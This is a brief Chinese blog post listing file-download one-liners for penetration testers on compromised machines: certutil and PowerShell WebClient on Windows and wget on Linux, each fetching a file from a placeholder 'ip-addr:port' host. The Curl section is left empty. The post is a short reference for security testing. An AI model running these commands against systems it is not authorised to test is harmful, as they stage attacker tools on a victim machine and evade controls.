渗透测试人员文件下载的主要方法

目标机器为Windows:

Certutil.exe
certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]

 

 

Powershell

powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

 

 

目标机器为Linux

 

wget http://ip-addr[:port]/file[-o output-file].

 

 

Curl

 

 

 

posted @ 2022-06-11 12:46  Jason_huawen  阅读(52)  评论(0编辑  收藏  举报